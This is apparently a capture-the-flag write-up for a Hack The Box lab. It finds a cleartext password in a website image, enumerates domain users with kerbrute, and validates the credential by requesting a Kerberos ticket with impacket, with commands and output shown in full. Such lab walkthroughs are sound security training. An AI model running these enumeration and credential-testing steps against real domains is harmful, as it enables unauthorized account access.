CLEARTEXT Credential in the Image
It turns out that the issue lies in the Our Features section of the static index page
As ridiculous as it appears, there is a CLEARTEXT credential apparently
(It would appear that the author wanted to showcase the extremely-highly-unlikely scenario of an organization accidently leaking a CLEARTEXT credential on their website.)
Based on the writing above, it would appear that whoever owns this agenda book needed to send a password to somebody named, “Hope Sharp”, and IsolationIsKey? appears to be the password
Validation
Considering that the naming convention the target organization uses has not been identified, I will follow through by generate a list of possible and common usernames made of “Hope Sharp”
Username
I will first attempt to identify the username
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ kerbrute userenum --dc research.search.htb -d SEARCH.HTB users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
2024/01/30 14:52:25 > Using KDC(s):
2024/01/30 14:52:25 > research.search.htb:88
2024/01/30 14:52:25 > [+] VALID USERNAME: administrator@SEARCH.HTB
2024/01/30 14:52:25 > [+] VALID USERNAME: research@SEARCH.HTB
2024/01/30 14:52:25 > [+] VALID USERNAME: research$@SEARCH.HTB
2024/01/30 14:52:25 > [+] VALID USERNAME: windows-12@SEARCH.HTB
2024/01/30 14:52:25 > [+] VALID USERNAME: hope.sharp@SEARCH.HTB
2024/01/30 14:52:25 > Done! Tested 14 usernames (5 valid) in 0.057 secondshope.sharp is a valid domain user
Password
I will now test out the password; IsolationIsKey?
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ impacket-getTGT SEARCH.HTB/hope.sharp@research.search.htb -k -dc-ip $IP
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
Password: IsolationIsKey?
[*] Saving ticket in hope.sharp@research.search.htb.ccacheValidated
TGT generated for the hope.sharp user